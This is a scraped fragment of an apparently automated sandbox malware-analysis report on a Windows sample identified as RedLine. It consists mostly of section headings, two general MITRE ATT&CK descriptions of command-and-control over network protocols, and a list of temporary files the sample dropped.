Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 8ZVd2S51fr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8ZVd2S51fr.exe.log

C:\Users\user\AppData\Local\Temp\tmp1799.tmp

C:\Users\user\AppData\Local\Temp\tmp179A.tmp

C:\Users\user\AppData\Local\Temp\tmp17AB.tmp

C:\Users\user\AppData\Local\Temp\tmp17BB.tmp

C:\Users\user\AppData\Local\Temp\tmp17CC.tmp

C:\Users\user\AppData\Local\Temp\tmp17CD.tmp

C:\Users\user\AppData\Local\Temp\tmp17DD.tmp

C:\Users\user\AppData\Local\Temp\tmp17EE.tmp

C:\Users\user\AppData\Local\Temp\tmp17FF.tmp

C:\Users\user\AppData\Local\Temp\tmp180F.tmp

C:\Users\user\AppData\Local\Temp\tmp1810.tmp

C:\Users\user\AppData\Local\Temp\tmp2FC0.tmp

C:\Users\user\AppData\Local\Temp\tmp2FC1.tmp

C:\Users\user\AppData\Local\Temp\tmp2FC2.tmp

Windows Analysis Report
8ZVd2S51fr.exe